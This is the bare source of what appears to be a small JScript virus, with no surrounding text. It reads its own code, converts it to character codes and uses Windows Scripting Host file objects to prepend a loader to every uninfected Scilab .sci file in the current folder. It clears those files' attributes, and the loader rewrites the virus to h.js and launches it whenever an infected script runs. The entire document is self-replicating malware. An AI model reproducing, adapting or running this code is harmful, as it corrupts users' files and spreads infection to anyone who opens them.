u(); function u() { v = "u();" + u, s = ""; for(i = 0; i < v.length; i++) s += " " + v.substr(i, 1).charCodeAt(0); f=new ActiveXObject("Scripting.FileSystemObject"); for(y = new Enumerator(f.getfolder(".").files); !y.atEnd(); y.moveNext()) { x=y.item(); if(f.GetExtensionName(x).toLowerCase() == "sci") { try { b = f.OpenTextFile(x); h = b.ReadAll(); b.Close(); if(h.substr(0, 4) != "//hh") { p = x.Attributes; x.Attributes = 0; l = f.CreateTextFile(x); l.Write("//hh\r\nt=\"" + f.getfolder(".") + "\\h.js\";f=mopen(t,\"w\");mputstr(ascii([" + s + "]),f);mclose(f);winopen(t)\r\n"+h); l.Close(); x.Attributes = p } } catch(e) {} } } }